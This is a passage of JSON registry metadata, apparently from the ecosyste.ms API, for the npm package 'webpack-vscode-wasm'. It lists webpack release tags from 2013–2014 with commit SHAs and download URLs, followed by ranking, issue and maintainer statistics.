ull,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T04:56:07.507Z","dependent_packages_count":0,"downloads":16,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":43.57593408664221,"dependent_repos_count":25.30552159382132,"dependent_packages_count":32.889739249478886,"stargazers_count":0.09401247727000961,"forks_count":0.5404068101319062,"average":20.481122843468867},"purl":"pkg:npm/webpack-vscode-wasm","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-vscode-wasm","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-vscode-wasm","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-vscode-wasm/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","